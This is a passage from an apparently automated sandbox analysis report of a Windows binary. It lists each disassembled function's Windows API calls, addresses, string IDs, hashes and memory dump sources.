                                                    • Opcode Fuzzy Hash: 71a7ba7ca447ba07c595a1942ff522503052d7f386c8f95d4f1f936055fd9977
                                                    • Instruction Fuzzy Hash: 27F02B7D801520DFDBB31B208C48AE9362C6F11700F154495F883E6464EF30CC4CCB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0031637F,?,?,003160AA,?,00000001,?,?,00000000), ref: 0031633E
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00316350
                                                    • FreeLibrary.KERNEL32(00000000,?,?,0031637F,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316362
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                     • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 145871493-3689287502
                                                    • Opcode ID: 940a79f2f835271ef176a489e3b633d6675269cd027fe38c599b58f15df38932
                                                    • Instruction ID: c5600a577188d90acccce4ecc1815f12c134d2ced9093137da48002cdc2d6469
                                                    • Opcode Fuzzy Hash: 940a79f2f835271ef176a489e3b633d6675269cd027fe38c599b58f15df38932
                                                    • Instruction Fuzzy Hash: C4E08636601B2117925317557C09ADA661D9F87B22B070115F903D2220DB60CD4280B0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003554C3,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316304
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00316316
                                                    • FreeLibrary.KERNEL32(00000000,?,?,003554C3,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316329
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                     • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 145871493-1355242751
                                                    • Opcode ID: 327840e62d74b0b0bd5064483f594072601c8e846dba0e81b0abd076c3fc0a94
                                                    • Instruction ID: 81c28f45c19aee4bcb8b19f67e80ed4e65534b2351eb8f81be1ed9d9459874c5
                                                    • Opcode Fuzzy Hash: 327840e62d74b0b0bd5064483f594072601c8e846dba0e81b0abd076c3fc0a94
                                                    • Instruction Fuzzy Hash: 66D0123A6425215742672765BC199CE7E19DE8FB213460519F813A2538CF60CD418590
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32 ref: 0039AD86
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0039AD94
                                                    • GetProcessIoCounters.KERNEL32 ref: 0039ADC7
                                                    • CloseHandle.KERNEL32(?), ref: 0039AF9C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                     • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                    • String ID:
                                                    • API String ID: 3488606520-0
                                                    • Opcode ID: ac7d5674ebf59211d234f1c8a07fa48e2c900c07874a44c2512164efe7f72126
                                                    • Instruction ID: da6ace7800217232bdbc713ac0c9a544963179bb7263007add0ba775e9dccafc
                                                    • Opcode Fuzzy Hash: ac7d5674ebf59211d234f1c8a07fa48e2c900c07874a44c2512164efe7f72126
                                                    • Instruction Fuzzy Hash: 69A1C1B5604700AFD725DF28C886F2AB7E5AF48710F14891DF95A9B2D2DB71EC40CB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 0039D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039C00D,?,?), ref: 0039D314
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D350
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3C7
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3FD
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039C404
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039C45F
                                                    • RegEnumKeyExW.ADVAPI32 ref: 0039C4C2
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 0039C505
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0039C512
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                     • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                    • String ID:
                                                    • API String ID: 826366716-0
                                                    • Opcode ID: daca07797155dde5f6951c35daf9f38455c7719b4353dbc92d8aafa9605eb251
                                                    • Instruction ID: 3b45cb23cf2f2cc788d23b0ee95a810c807d57157d86e4691c98bf97633b0a9f
                                                    • Opcode Fuzzy Hash: daca07797155dde5f6951c35daf9f38455c7719b4353dbc92d8aafa9605eb251
                                                    • Instruction Fuzzy Hash: F761C531218241AFD716DF14C490E6ABBE5FF88308F55959CF4998F2A2CB31ED45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0037E60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0037D6E2,?), ref: 0037E629
                                                      • Part of subcall function 0037E60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0037D6E2,?), ref: 0037E642
                                                      • Part of subcall function 0037E9C5: GetFileAttributesW.KERNELBASE(?,0037D755), ref: 0037E9C6
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0037EC9F
                                                    • MoveFileW.KERNEL32(?,?), ref: 0037ECD8
                                                    • _wcslen.LIBCMT ref: 0037EE17
                                                    • _wcslen.LIBCMT ref: 0037EE2F
                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0037EE7C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                    • String ID:
                                                    • API String ID: 3183298772-0
                                                    • Opcode ID: 781fc2e015b1bf9ccf4c9baac56df84d8f43d020213f5de2ea15c993b4be63c3
                                                    • Instruction ID: 194087132e99d5621a5cdac7136d7e5a8f4c6ba44d0fc866f9226aaf33f4e839
                                                    • Opcode Fuzzy Hash: 781fc2e015b1bf9ccf4c9baac56df84d8f43d020213f5de2ea15c993b4be63c3
                                                    • Instruction Fuzzy Hash: 6A5164B24083859BC776EBA4D8819DBB3ECAF89310F00492EF589D7151EF74A6888756
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                     • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetInputState.USER32 ref: 00384225
                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 0038427C
                                                    • TranslateMessage.USER32(?), ref: 003842A5
                                                    • DispatchMessageW.USER32 ref: 003842AF
                                                    • PeekMessageW.USER32 ref: 003842C0
                                                    Similarity
                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                    • String ID:
                                                    • API String ID: 2256411358-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowRect.USER32 ref: 003721A5
                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00372251
                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00372259
                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 0037226A
                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00372272
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003A60A4
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 003A60FC
                                                    • _wcslen.LIBCMT ref: 003A610E
                                                    • _wcslen.LIBCMT ref: 003A6119
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003A6175
                                                    Similarity
                                                    • API ID: MessageSend$_wcslen
                                                    • String ID:
                                                    • API String ID: 763830540-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003707D1,80070057,?,?,?,00370BEE), ref: 003708BB
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003707D1,80070057,?,?), ref: 003708D6
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003707D1,80070057,?,?), ref: 003708E4
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003707D1,80070057,?), ref: 003708F4
                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003707D1,80070057,?,?), ref: 00370900
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380BE0
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380BED
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380BFA
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380C07
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380C14
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380C21
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _free.LIBCMT ref: 0034264E
                                                      • Part of subcall function 00342D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0034DB71,003E1DC4,00000000,003E1DC4,00000000,?,0034DB98,003E1DC4,00000007,003E1DC4,?,0034DF95,003E1DC4), ref: 00342D6E
                                                      • Part of subcall function 00342D58: GetLastError.KERNEL32(003E1DC4,?,0034DB71,003E1DC4,00000000,003E1DC4,00000000,?,0034DB98,003E1DC4,00000007,003E1DC4,?,0034DF95,003E1DC4,003E1DC4), ref: 00342D80
                                                    • _free.LIBCMT ref: 00342660
                                                    • _free.LIBCMT ref: 00342673
                                                    • _free.LIBCMT ref: 00342684
                                                    • _free.LIBCMT ref: 00342695
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003305D2: EnterCriticalSection.KERNEL32(003E170C,?,00000000,?,0031D1DA,003E3540,00000001,00000000,?,?,0038EF39,?,?,00000000,00000001,?), ref: 003305DD
                                                      • Part of subcall function 003305D2: LeaveCriticalSection.KERNEL32(003E170C,?,0031D1DA,003E3540,00000001,00000000,?,?,0038EF39,?,?,00000000,00000001,?,00000001,003E2430), ref: 0033061A
                                                      • Part of subcall function 00330433: __onexit.LIBCMT ref: 00330439
                                                    • __Init_thread_footer.LIBCMT ref: 00396B95
                                                      • Part of subcall function 00330588: EnterCriticalSection.KERNEL32(003E170C,00000000,?,0031D208,003E3540,003527E9,00000001,00000000,?,?,0038EF39,?,?,00000000,00000001,?), ref: 00330592
                                                      • Part of subcall function 00330588: LeaveCriticalSection.KERNEL32(003E170C,?,0031D208,003E3540,003527E9,00000001,00000000,?,?,0038EF39,?,?,00000000,00000001,?,00000001), ref: 003305C5
                                                      • Part of subcall function 00383EF6: LoadStringW.USER32(00000066,?,00000FFF,003ADCEC), ref: 00383F3E
                                                      • Part of subcall function 00383EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 00383F64
                                                    Strings
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                    • String ID: x3>$x3>$x3>
                                                    • API String ID: 1072379062-883808319
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0031D203
                                                    Strings
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: D5>$D5>$D5>
                                                    • API String ID: 1385522511-3648186090
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0037BCDF: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00372A60,?,?,00000034,00000800,?,00000034), ref: 0037BD09
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00372FF0
                                                      • Part of subcall function 0037BCAA: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00372A8F,?,?,00000800,?,00001073,00000000,?,?), ref: 0037BCD4
                                                      • Part of subcall function 0037BC06: GetWindowThreadProcessId.USER32(?,?), ref: 0037BC31
                                                      • Part of subcall function 0037BC06: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00372A24,00000034,?,?,00001004,00000000,00000000), ref: 0037BC41
                                                      • Part of subcall function 0037BC06: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00372A24,00000034,?,?,00001004,00000000,00000000), ref: 0037BC57
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0037305D
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003730AA
                                                    Strings
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0037CAC6
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 0037CB0C
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003E2990,00DD9580), ref: 0037CB55
                                                    Strings
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem
                                                    • String ID: 0
                                                    • API String ID: 135850232-4108050209
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003ADCD0,00000000,?,?,?,?), ref: 003A4E09
                                                    • GetWindowLongW.USER32 ref: 003A4E26
                                                    • SetWindowLongW.USER32 ref: 003A4E36
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003A489F
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003A48B3
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003A48D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003A5064
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003A5072
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003A5079
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003A419F
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003A41AF
                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003A41D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003A4BAE
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003A4BC3
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003A4BD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003A6220
                                                    • SetMenuItemInfoW.USER32 ref: 003A624D
                                                    • DrawMenuBar.USER32(?,?,00000030,?,00000030), ref: 003A625C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw
                                                    • String ID: 0
                                                    • API String ID: 3227129158-4108050209
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003B0BD4,?), ref: 00370E80
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003B0BD4,?), ref: 00370E98
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,003ADCE0,000000FF,?,00000000,00000800,00000000,?,003B0BD4,?), ref: 00370EBD
                                                    • _memcmp.LIBVCRUNTIME ref: 00370EDE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
